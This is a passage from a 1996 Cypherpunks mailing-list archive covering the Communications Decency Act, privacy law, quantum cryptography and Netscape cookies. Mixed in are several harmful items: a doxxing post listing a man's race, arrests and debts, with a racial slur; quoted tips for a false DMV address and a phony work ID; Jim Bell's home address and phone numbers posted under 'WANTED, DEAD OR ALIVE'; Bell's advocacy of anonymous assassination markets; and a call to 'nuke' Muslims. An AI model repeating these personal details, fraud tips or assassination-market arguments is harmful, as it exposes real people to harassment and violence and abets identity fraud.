BTM> of feeding the computers false information about myself. I never use the Social
BTM> Insecurity Number assigned to me... I don't even give it to the Bank. This makes
BTM> for some rather dicey situations. I rarely use my real name or give out my real
BTM> phone number. At this point in my life... I have *NO* credit history. I currently 
BTM> have *NO* bank account. My goal is to be completely invisible to the system.
BTM> Yes I have had a few glitches in this plan from time to time... but I continue to 
BTM> work on it.

Well, Mr. Anonymous, let's see how well YOU have used your own advice.  With
just a little effort using WEB search engines available to everyone on the net I
have found the following:

Yes you have no credit history, at least not a positive history and you have no bank
account.  However, these "accomplishments" were not the result of your "goal" to be "invisible to the system".  You have a credit history, a VERY poor one.  This and the fact that you have no bank account stems from the fact that you are a deadbeat not some cyber-hero looking to "drop-out" of the system.  You are approximately $13,000.00 behind in child support.  In fact a search of the records available to the general public reveals you were recently arrested for failure to pay child support.  A fund rasing campaign was instituted in several USENET and FIDONET newsgroups to raise your bail when your attorney-employer abandoned you in jail.  In fact you have been arrested several times in the last 12 months for some rather abberant behavior.

Let me list the things I have been able to find out about you:

1) You are an African-American Male, age 36.

2) You live in Indianapolis, Indiana.

3) You are the on-again off-again bodyguard for Militia-Patriot attorney Ms. Linda         Thompson and was with her when she was arrested (again)12-23-95.

4) You were arrested for attempting to smuggle weapons (bullets?) into the Indianapolis     County Jail 07-22-95.

5) You are about 6'4" tall and weigh 260#.

6) You also use the IRC name "Shaka".

7)  You are a deabeat dad being $13,000.00 in arrears in child support.

8)  You recovered some property for Ms. Thompson and filed a Police Report
     # 9531780A.

9)  You wrote a letter to the editor in the Indianapolis Post Spotlight lamenting you "child      support" woes.  Pathetic, very pathetic.


So while you are off being a cool anonymous dude the rest of us are paying for the AFDC you ex-wife has to use to feed the kids.  How do you justify an internet account while being $13,000.00 in arrears on child support?  You are a disgrace to your race, the Militia-Patriot movement and men in general.

BTM> I just have never felt warm and fuzzy knowing that any government agency,
BTM> business, or whoever can get my personal information off a computer could come
BTM> knock on my door some dark night. If you're interested in fortifying your privacy,
BTM> I can give you a few pointers.

BTM> 1.) Go to your local DMV and inform them you've had a change of address. I
BTM>      selected a high rise apartment building with 15 floors and selected an address
BTM>      on a non-existant 23rd floor. Getting your Driver's License address changed
BTM>      should cost less than $10.00.

This is a violation of Indiana Code but breaking the law is of no concern to you, huh?

BTM> 2.) Go find a company like "Mail Boxes Etc." and rent a mailbox. The cost is
BTM>      nominal compared to the added privacy and security. The distinction between
BTM>      a mailbox and a Post Office Box is with a mailbox you have an actual street
BTM>      address. You can receive deliveries from UPS and Federal Express at a 
BTM>      mailbox. You can't at a P.O. Box.

BTM> 3.) This part requires some skill... befriending a graphic artist is a good idea for 
BTM>      this one. But what you need is a phony work identification.  Pick a name! A 
BTM>      couple of "Pass Port Photos" and some lamination and you're good to go.

This is a violation of Indiana and Federal Laws depending on how they are used.

BTM> 4.) Take your new persona down to your local utility companies and get the serv-
BTM>      ice switched to the name of your new persona. Even get your phone switched
BTM>      and have the number non-published. You'll be pleasantly surprised from now
BTM>      on, everytime your phone rings, it will be someone you really want to talk to.

Another violation of Indiana Code




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 15 Feb 1996 20:04:27 +0800
To: "Declan B. McCullagh" <stend@grendel.texas.net>
Subject: Common Carrier Status is Often a Red Herring
Message-ID: <ad47ef690d021004aaa9@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


[I picked a new thread title. Speaking of which, YACM (Yet Another
Cyberspace Magazine) is out: "Herring," or "Red Herring," or "Pickled
Herring." I only glanced at it long enough to see that it had the
obligatory interview with cyberspace guru Marc Andreesen, the obligatory
cover photo of Steve Jobs, and the obligatory other techno-rave articles.
Probably several mentions of PGP, but I didn't bother to look for them.
Needless to say, I put it back on the shelf before being too heavily
contaminated.]


At 7:48 PM 2/14/96, Declan B. McCullagh wrote:

>Since you don't understand the way Federal criminal charges work,
>there's no reason I should take your argument seriously. (Hint: The
>*U.S. Attorney*, or an AUSA, files charges, not you, me, or a random
>"athiest.")
>
>As for this mythical Bible being removed, that is irrelevant to this
>discussion, which centers around a Bible being *prosecuted*. If I had a
>Bible on my web site (perhaps the TCM Vernacular Translation!) I'd
>remove it just to make a point. As I suspect the owner of the web pages
>did.

By the way, this is one reason why the "try to be like a common carrier"
arguments are somewhat weak. Let me explain.

I hear often on this list and in other places that Web sites and other Net
sites should strive to be as much like common carriers as possible, that
removing any items or discouraging controversial material (Zundelsites,
militia sites, Sarin formulas, antifeminista material, etc.) will weaken
their defense in a legal case.

Well, I don't buy it. Maybe in the abstract, and in the long run, it has
worked out that common carrier status involves non-intervention. However,
in the real world it is _real prosecutors_ who decide who to go after. Real
prosecutors who are ordered to prosecute a CDA case are not going to go
after clean-living ISPs who happened to let one questionable item through,
they're going to go after the rough trade, just as Declan suggests.

Now, in the real world, does anybody think that "The Christian Fellowship
Internet Service Provider," which has taken numerous steps to limit access
to indecent material, is *more likely* to be prosecuted by federal
prosecutors than "Buck Satan's Anything Goes Web Site"? (Hint: "Common
carrier" status is not something that gets handed out to some Internet
providers and not others. Second hint: so far as I have heard, there has
not yet been any determination as to whether some ISPs are "common
carriers" and others are not.)

The realpolitik of it is that an ISP which tries to limit access by minors,
which discourages Zundelsite material, and which makes soothing comments
about Jess Helms and the Christian Right will of course be *far less
likely* to be prosecuted under whatever CDA charges come up as some
leftist, anarchist, radical ISP which takes a hands-off approach. Sad, but
true. This is also known in legal circles as "the chilling effect."

[ObPerry: "What does this have to do with the  IPv6 domestic distibution?"
ObAnswer: "Nothing. Since you're so concerned about people coding, go back
to coding."]

---Tim May

Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Thu, 15 Feb 1996 21:06:34 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199602150544.VAA23815@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


>Meanwhile
>        WANTED, DEAD OR ALIVE
>        JIM BELL
>        REWARD 13 demo-cyberbucks

     Send your contributions to:

         James D. Bell
         7214 Corregidor Road
         Vancouver, WA
         (503) 696-3911
         (503) 737-0284
         (503) 737-0357

>An assassination-sponsoring society is _not_ a polite society.

The first rule of not being seen is "Don't stand up".







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Thu, 15 Feb 1996 21:40:41 +0800
To: "Declan B. McCullagh" <cypherpunks@toad.com
Subject: Re: Spin Control Alert (LI Newsday, 2/12/96)
Message-ID: <199602150552.VAA09945@news1.best.com>
MIME-Version: 1.0
Content-Type: text/plain


jamesd@echeque.com:
>> While the religious right clearly supported the push to regulate the
>> internet, the main push seemed to me to come from the existing mass
>> media, primarily the three big TV channels.

At 02:09 PM 2/14/96 -0500, Declan B. McCullagh wrote:
>The religious right did not *support* the "push to regulate the
>Internet" -- they drafted, defended, and pushed through the damn CDA!

Bunkum

Name this Christian rightist who drafted or defended the CDA!

The primary anti porn activists involved in the effort to regulate the net
were Donna Reed, and Marty Rimm, neither of whom are members of the Christian 
right, and Bill Arms, who is not only not a member of the Christian right,
but who in additon is a PC academic.

While their campaigns received assistance, encouragement, and free labor
from the Christian right, it was not the Christian right that enabled these
people to exercise the disproportionate power and influence that they did.

It was not the Christian right that obtained totally undeserved publicity 
for Rimm's spurious findings.

Rimm's study had connections both with the right and the left, but the real
question is where the big muscle came from.  If the big muscle came from
the Christian right they would have let us know by now, because they always
tend to exaggerate their influence and power.

While the effort to regulate the net had *links* to the Christian right, it
is simply untrue to say that it was composed of the Christian right, or even
to say that the Christian right played a significant role in the effort.  Their
role is scarcely visible.  They were minor foot soldiers.



 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 15 Feb 1996 20:24:01 +0800
To: cypherpunks@toad.com
Subject: Carrying the Bible an Offense?
Message-ID: <ad47f4eb0e021004f610@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:41 PM 2/14/96, Sten Drescher wrote:
>"Declan B. McCullagh" <declan+@CMU.EDU> said:
>
>DBM> (I assume your Bible argument is just posturing. No
>DBM> U.S. Attorney, political appointees they, ever will prosecute
>DBM> someone who puts the complete text of the King James Bible
>DBM> online.)
>
>        You assume wrong.  While I certainly agree that no
>U.S. Attorney would voluntarily prosecute such a case, what happens
>when an athiest files charges against someone for carrying the Bible?
>IANAL, but couldn't the U.S. Attorney be forced to prosecute?

I'm also not a lawyer, but no prosecution is possible in this situation.
Not in this country. A case must be presented to a grand jury (remember the
Zimmermann case?) and no grand jury in the United States would do this.

There are two further points which need clearing up:

1. Private citizens (the atheist in this case) do not file criminal
charges. They may swear out a complaint ("I witnessed John Doe carrying a
Bible"), but they do not file criminal charges.

2. The "carrying of a Bible" is not covered by the CDA.

No prosecutor can be "forced" to prosecute, absent approval by a grand
jury. (And if a prosecutor doesn't want to indict a ham sandwich, it won't
be indicted.)

--Tim May

[This Bible excerpt awaiting review under the Communications Decency Act]
And then Lot said, "I have some mighty fine young virgin daughters. Why
don't you boys just come on in and fuck them right here in my house - I'll just
watch!"....Later, up in the mountains, the younger daughter said. "Dad's
getting old. I say we should fuck him." So the two daughters got him drunk and
screwed him all that night. Sure enough, Dad got them pregnant....Onan really
hated the idea of doing his brother's wife and getting her pregnant while
his brother got all the credit, so he pulled out before he
came....Remember, it's not a good idea to have sex with your sister, your
brother, your parents,
your pet dog, or the farm animals, unless God tells you to. [excerpts from
the Old Testament, Modern Vernacular Translation, TCM, 1996]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: <cwalton@jovanet.com>
Date: Thu, 15 Feb 1996 21:28:51 +0800
To: <cypherpunks@toad.com>
Subject: Re: FW: Laugh Of The Day - Fri, Feb 02 1996 (fwd)
Message-ID: <9602150559.AA28269@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


I just have to ask-- what does this have to do with........

>few participants; the purists spend lots of time self-righteously
>congratulating each other on keeping off-topic threads off the list).

oh, never mind. i see now......

Conrad Walton                           
http://www.industrial-artworks.com/
---------------------------------------------------------------------------
---
 INDUSTRIAL ARTWORKS  |  POB 2815, El Segundo, CA 90245  |  1-310-640-3365





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Thu, 15 Feb 1996 19:51:10 +0800
To: cypherpunks@toad.com
Subject: Re: Linux on the Mac
In-Reply-To: <199602141526.HAA09379@netcom20.netcom.com>
Message-ID: <RmLBJD56w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


cjs@netcom.com (cjs) writes:
> I personally think that Linux International (they still around?)
> should put out a counter press-release informing the public that the
> Apple/OSF Linux shares only the name.

I'm not sure what the crypto relavance of this is, but perhaps Er*c H*ghes
should put out a counter press release informing the public that people who
a) don't know much about crypto b) seek to restrict other people's freedom of
speech based on their political views should not call themselves "cypherpunks".

:-)

P.S. Don't ever do any business with the thieves at Cygnus.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Thu, 15 Feb 1996 21:31:21 +0800
To: cypherpunks@toad.com
Subject: Re: The Internet Party
In-Reply-To: <199602142101.NAA25866@well.com>
Message-ID: <Pine.ULT.3.91.960214221256.20610D-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


I say we elect Jim Bell, then kill him.

More seriously (or maybe I was serious), an "Internet party" just makes 
no sense to me. There's far too much diversity of views for the Internet 
to be a "party." Perhaps the "Internet party" could take shape as a 
corporatist pressure group, but hte record of corporatist systems is not 
great. 

I'm happy with the EFF and such remaining special interest groups with no 
partisan political baggage. "No entangling alliances," as Washington 
said, and no compromises.

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim Philp <bplib@wat.hookup.net>
Date: Fri, 16 Feb 1996 06:12:05 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Fair Credit Reporting Act and Privacy Act
In-Reply-To: <ad478e480a021004d8cf@[205.199.118.202]>
Message-ID: <Pine.OSF.3.91.960214221608.28464C-100000@nic.wat.hookup.net>
MIME-Version: 1.0
Content-Type: text/plain



On Wed, 14 Feb 1996, Timothy C. May wrote:

> (Tim Philp's idea that this would only apply to "corporations" or
> "businesses" (not clear which he means) misses the point. Am I, for
> example, a business? Having such laws kick in at some well-defined
> threshold would simply shift the nature of the information-gatherers...for
> example, they's subcontract out the record-keeping to a raft of smaller,
> linked entities. Then you'd have to prosecute people and companies for
> accessing illegal data banks, etc.)

	I think that the reason that this was not clear was because it was
not central to my argument. I was not "really" suggesting that only
corporations be included by this law. I do realise what a corporation is
and that some very small entities can be a corporation. 
	What my central thesis was that people who take information from 
me for one purpose, ie health care, hydro, internet provision, etc, 
should be required to keep this information confidential. If I detect a 
violation of this confidentiality, I should have an expectation of some 
legal recourse. 
	If I apply for a credit card and use it to buy a hockey glove (how
Canadian eh) I should not expect to be on the mailing list of every
sporting goods operation in North America! I should be able to expect 
that my doctor's files on me will be kept confidential. This is certainly 
an area where you cannot provide false information as medical records must 
be accurate to provide for future care.
	Again, I am not suggesting prior restraint. I simply want to sue 
the bastards who violated my expectation of privacy.

Warm Regards,
Tim Philp





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David E. Smith" <dsmith@midwest.net>
Date: Thu, 15 Feb 1996 21:45:07 +0800
To: cypherpunks@toad.com
Subject: Science News - article on Quantum Crypto
Message-ID: <2.2.32.19960215051324.0067ca00@204.248.40.2>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

The new Science News that showed up in today's mail
has a short but informative article on quantum
cryptography.  It explains what quantum crypto is for
us newbies and gives the history of a recent success
in Lake Geneva (Switzerland, not Wisconsin) - an
encrypted message was sent 22.7 km over fiber-optic
cable successfully.  It's a nice article.

dave



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMSLAYzVTwUKWHSsJAQHAPQf6A4h68OSIUK7qOkZVrZByDg/1VGZweiti
3FpCGC/GHqZ9jZwJJOVqx7DucWEeXkeJtnepQsGr+SB/RBEnBfPwpkbSAS0wQnMX
D9mUR/p8yRPVWA8baodcG8NRWd4CMiA2+x/vxJEht6/gUx5YfSNQ5wOWQWA1AN4U
5BH/yqSe53m6Rm4h5r3z7ve9OU37wd1gjDgmqwRsiN2UsyZ035om63cPqqMFTIfd
0+PX+cQxag2tz1AXcwwyMpkKhKEmRL3FvW0eyOKXS0b9EcuYRPBEBLDmXzJnIaId
lt9EN4iyRgbux4S3M4OmMJB80kaTK2TPurb2fFO+LeuJJdnWa6MfGw==
=jLBT
-----END PGP SIGNATURE-----
-----
David E. Smith,  c/o Southeast Missouri State University
1000 Towers Circle South MS 1210 Cape Girardeau MO 63701
dsmith@midwest.net, dsmith@alpha.c2.org,  PGP 0x961D2B09
(573)339-3814    http://www.midwest.net/scribers/dsmith/
"Reality is only for those lacking in true imagination."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Thu, 15 Feb 1996 21:54:38 +0800
To: Brian D Williams <cypherpunks@toad.com
Subject: Re: The Internet Party
Message-ID: <199602150738.XAA11996@news1.best.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:01 PM 2/14/96 -0800, Brian D Williams wrote:
>Why not form our own Party?
>
>The Internet party........

No matter how excellent the people and the goals of such a party:
such a party would be a first step to creating a world state.

Good intentions, dreadful consequences.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 15 Feb 1996 21:01:39 +0800
To: cypherpunks@toad.com
Subject: Re: True democracy the electronic way
Message-ID: <ad480f2b0f02100420ba@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:03 AM 2/15/96, Vladimir Z. Nuri wrote:

>1. this is an extremely interesting problem in my opinion. the ideal
>form of government has not been achieved in many millenia. could it
>be solved given the full power of the information age, i.e.
...
>if anyone knows of
>a mailing list to discuss this concept of trying to apply technology
>to government, I would be most interested. the closest I can see


You might try the "Cypherwonks" mailing list that L. Detweiler set up a
couple of years ago to explore the very ideas you are supporting here. You
might find you have a lot in common with him.

--Klaus!, a tentacle


Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Thu, 15 Feb 1996 22:11:40 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Online Zakat Payment: Religious tithe.
In-Reply-To: <ad4541d1000210045325@[205.199.118.202]>
Message-ID: <Pine.SOL.3.91.960215000050.10577A-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 12 Feb 1996, Timothy C. May wrote:

> 
> Yes, such as collecting funds to send to Jim Bell to arrange for the
> assassination of Salman Rushdie.
> 
> Once again, the gutter religion of Islam reveals the derangement of its
> so-called Prophet.
> 
> The world really needs to get around to nuking these folks.

Nuke *Fulham*? I thought you might have picked up a few tidbits from the
last nukepunks thread, but just in case- despite what you may have heard,
nuclear weapons are not precision tools. A device dropped on Fulham would
probably not be welcomed by Her Majesty's Government, although since the
blast damage would probably level Kensington Palace to the ground, it
would solve the Diana problem. 


 ---
They say in  online country		So which side are you on boys
There is no middle way			Which side are you on
You'll either be a Usenet man		Which side are you on boys
Or a thug for the CDA			Which side are you on?
  National Union of Computer Operatives; Hackers, local 37   APL-CPIO





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 15 Feb 1996 22:42:03 +0800
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: [ASSASSINATION NOISE] Re: V-chips, CC, and Motorcycle Helmets
Message-ID: <m0tmyjs-0008zeC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 08:11 PM 2/14/96 -0800, Bill Stewart wrote:
>At 11:36 AM 2/13/96 -0800, you wrote:
>
>>The Rushdie incident is simply so far removed from "Assassination Politics" 
>>that it can't possibly be used to refute it; I still believe it actually 
>>demonstrates how much effort somebody has to go to, to protect a targeted 
>>person.  One targeted person is easy to protect.  10,000 would be FAR 
>>harder.  And the moment a few of those guys got "whacked," the rest would 
>>want to resign their jobs and hope they would be allowed to retire in peace.
>
>Rushdie is just low on your target list.  I agree that it's much harder
>to protect 10,000 people (say the Iranians put out a contract on Baha'is
>and other heretics, at $X/head...) but it's still abusable. 

Does the fact that some system is "abusable" mean that it is not better than 
the current system?  Or are you under the impression that the current system 
is NOT "abusable"?!?  The reason I mention this is that I get the strange 
impression that the system I advocate is being judged by a different 
standard than the status quo.  "Double standard," is the usual term.  Is 
this fair?

Let's consider the Rushdie situation in more detail.  Why is he in danger?  
Because, obviously enough, some high-ranking LEADERS in the Moslem faith put 
a contract out on him.  Okay, if they're high-ranking, and they're well 
known, and they're putting out contracts on people, RECIPROCATE!

See how this works?  If "Ayatollah X" says, "Kill Rushdie and we'll give you 
a couple million dollars," then "AsPol" that Ayatollah to death, a dollar at 
a time.  Pretty soon, no "high-ranking" Moslem would DARE put out a contract 
on a Rushie-like character, for fear of getting killed himself.

Of course, it is  true that individual Moslems could ALSO use the 
"Assassination Politics" mechanism, but they would have to be 
self-motivated, because the system is designed to be anonymous.  Keep in 
mind that "nobody" would have ever heard of the name "Rushdie" if it hadn't 
been for that contract.

> Maybe the
>Anonymous Captains of Industry put out a contract on strike leaders.

People keep talking about "leaders" as if we NEEDED leaders  SHEESH!  Stay 
stuck in your old ruts if you want, but the fact is the world is changing 
from a "leader-centric" system to a distributed-control system, assisted by 
digital anonymity.  

>>From a cypherpunks perspective, yes you could run an assassination lottery,
>though it might be hard for the assassin to collect - how do you prove
>that _you_ were the hit man, and not merely the nearest person to a phone
>after it happened?  How do you prevent an anonymous escrow agency from 
refusing
>to deliver the cash?  Some of the protocols may be difficult to work out.

There are a lot of interesting questions implied by the above paragraph, and 
I will be happy to discuss them, in the next note, tomorrow.  If anything, I am 
surprised that there hasn't been more commentary along these lines than has 
occurred up to now.  Frankly, if I want to discuss the POLITICAL aspects, I 
typically do that in NWLIBERTARIANS@TELEPORT.COMO, not Cypherpunks.  The 
main reason I subscribed to Cypherpunks is that I wanted the TECHNICAL 
issues discussed, debated, and perfected.

The problem, I think, is that people (like, for instance, Perry) complain 
about the political-implications discussion of AsPol, but he clearly doesn't 
want to move the discussion to a more technical "Cypherpunks"-type level, 
with detailed discussions of protocols, trust issues, etc.  I _DO_.


>Meanwhile
>        WANTED, DEAD OR ALIVE
>        JIM BELL
>        REWARD 13 demo-cyberbucks

Hey, I'm not easily offended!  Actually, while I think this is rather funny, 
I am fully aware that the truth is that my idea will upset a few million 
apple-carts.  And yes, I wouldn't be surprised if I'm one of the first 
victims of this system. (I am careful to point out, however, that I believe 
a system such as this to always have been inevitable;  Jim Bell is merely 
one of the first to notice the ultimate implications of this system.)

As I said long ago, there are some words in "A Tale of Two Cities" which 
describes my feelings on the subject.


>
>An assassination-sponsoring society is _not_ a polite society.

Question:  How would you know?  Since we've never had anything even remotely 
approaching the system I advocate, how can you say how "polite" it would be?

Jim Bell

jimbell@pacifier.com

Klaatu Burada Nikto

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMSLpnPqHVDBboB2dAQESewP/X2KCgxxdWtCe/T26Pp7QadhwgkYv7bHT
PFj9SYKh07WlMQKQaL6kWvwtlx/LWJGjEWvU5wBBgp4Xrslmy6KKkjtjl0TwiGnA
sEKYCrjvXthSjcydt9O7zHRV+z9/khN+qw1WumCzQHSbbaW7DpaK4eQRmmOqcqD6
565Ay/AFJVY=
=/dWe
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Kurt Buff (Volt Comp)" <a-kurtb@microsoft.com>
Date: Thu, 15 Feb 1996 22:39:19 +0800
To: "A. Padgett Peterson P.E. Information Security" <PADGETT%TCCSLR@emamv1.orl.mmc.com>
Subject: RE: Re:
Message-ID: <c=US%a=_%p=msft%l=RED-06-MSG960215001238XS005300@red-01-imc.itg.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain



>}The United States is a sovereign nation. Do you dispute that ? The
>}constitution is a binding agreement between the government and its
>citizens
>}that determines how that sovereignty will be exercised, the elements in
>which
>}the nation will not interfere with citizens, and the duties which it will
>}carry out.
>
Haven't read much Lysander Spooner, or merely ignoring him?

If the former, try his essay:

No Treason: The Consitution of No Authority.

You can find it on the web, just use your favorite spider/whatever.

If the Constitution is a binding agreement, show me where I signed. A
contract requires two things of which I am aware (maybe some others that I
am not, since IANAL :-) - Agreement by all signatories, and performance. We
have at least one missing item in that list. If you wish to make the
argument that since I have paid taxes, I have agreed, then I will most
heartily beg to differ. I pay under protest, sometimes silent, sometimes
not, but never do I pay willingly.

If on the other hand you wish to argue from different grounds, I will
listen. But, with all due respect for your opinions (which is considerable,
actually) I expected better.

Kurt

>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jf_avon@citenet.net (Jean-Francois Avon (JFA Technologies, QC, Canada))
Date: Thu, 15 Feb 1996 20:33:48 +0800
To: cypherpunks@toad.com
Subject: Hey Derek: who are you? (toad.com is glitching...)
Message-ID: <9602150517.AA11469@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


Would the author of this message please reply to me by e-mail?

I received it under the name <owner-cypherpunks@toad.com>,
with no subject whatsoever.  The remailer is freakin' out...



>The other question I have is: who do you think the "customers" of PGP
>are?  If you think the majority of PGP's customers are the
>crypto-privacy activitst types, you are highly mistaken.  PGP has hit
>the main stream, and is being used by many non-crypto-aware people.
>Probably more of them than there are of us.
>
>If you want to discuss this more, let's take it to private email,
>please.
>
>-derek
>
>
**** NEW PGP 2.6.2 KEY *********

2048 bits Key ID:24201BA1 1996/02/13 Jean-Francois Avon <jf_avon@citenet.net>
Key fingerprint =  23 B6 24 31 86 67 FB 35  C7 A7 AF 12 A1 61 E9 3D 


**** OLD KEY: DO NOT USE ANYMORE UNLESS FOR VERIFYING SIGNATURES ****

1024 bits Key ID:57214AED 1995/10/04 Jean-Francois Avon <jf_avon@citenet.net>
Key fingerprint =  84 96 76 AE EB 7C AB 15  88 47 87 B0 18 31 74 9F 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 15 Feb 1996 22:40:42 +0800
To: jf_avon@citenet.net (Jean-Francois Avon (JFA Technologies, QC, Canada))
Subject: Re: fortune and predictions...
Message-ID: <m0tmz8s-00091XC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:55 PM 2/14/96 -0500, Jean-Francois Avon (JFA Technologies, QC, Canada)
wrote:
>GREETINGS!
>
>>(BTW, why don't you  respond to the list?)
>
>Actually, I just did.  I was tempted to mail the stuff directly to you but
then,
>I realised that you might have interpreted what I said as a threat. 

Huh? I didn't even notice.   Well, I guess after a few months of promoting
"Assassination Politics", I'm so thick-skinned that nothing fazes me anymore.

>So I posted it
>publicly. (Isn't CPunks about being untrustfull... :)

The reason I'd prefer most of the discussion on the list is simple:  I have
a limited amount of time, and I'm promoting an idea.  If you have a good
argument that I should be able to address, I want everyone to have the
benefit not only of your comment but also my response!


>I brought an argument in my post.  I could develop it further on private
e-mail with you.

I'll read it.  However, my mail has slowed to a trickle today.  There's
something wrong, somewhere.  It'll come flooding in, in a few hours I'll bet.


>You will certainly understand my argument.  I'd be delighted if you can
prove me wrong.

We shall see...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Thu, 15 Feb 1996 22:53:12 +0800
To: Deranged Mutant <WlkngOwl@UNiX.asb.com>
Subject: Re: Netscrape's Cookies
In-Reply-To: <199602132121.QAA16259@UNiX.asb.com>
Message-ID: <3122F324.285@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Defanged Fruit-ant wrote:  (Hey, he called us Netscrape :-) )
> 
> Ready the article about the COOKIE.TXT file that Netscape creates.
> Apparently my copy has yet to modify it since it was installed... so
> much for 'hacking' it (I decided to try and leave it write-protected
> for now).
> 
> I'm curious if anyone knows which sites use/modify it.

  Sites that use the Netscape Merchant system for online malls use cookies
for keeping track of your "shopping basket".  I don't think they use
persistent cookies, so they will never get written to the file on disk.
Such sites include the netscape online store (merchant.netscape.com)
and the MCI mall at www.internetmci.com.

> Also wondering why Netscape seems to touch/modify the certification
> key files every time it runs.

  It is an artifact of the database library that we are using.  The
certificates and keys are not actually being written each time.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Thu, 15 Feb 1996 22:51:23 +0800
To: cypherpunks@toad.com
Subject: Re: Cookie Crumbles
In-Reply-To: <199602141606.LAA27401@pipe4.nyc.pipeline.com>
Message-ID: <3122FB4E.20EF@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


John Young wrote:
>    Still, be alert for invasive snoops and tracking analytics,
>    not only by NSCP, but by all those invaders crying mea
> culpa,
>    "you misjudge the goodness in our hearts, we did it for your
>    own good, like all good parents. Trust us."

  You may choose not to believe me, but I have been planning to add an option
to disable cookies in the next release for quite some time now.

  Just disabling cookies won't keep sites from tracking your movements.
Many sites require you to register and log in when you access them.
These sites will be able to track your movements through them with or
without cookies.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Leslie Todd Masco <cactus@hks.net>
Date: Thu, 15 Feb 1996 21:14:29 +0800
To: cypherpunks@toad.com
Subject: Re: Subject lines?
Message-ID: <199602150628.BAA07627@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Rich Graves wrote:
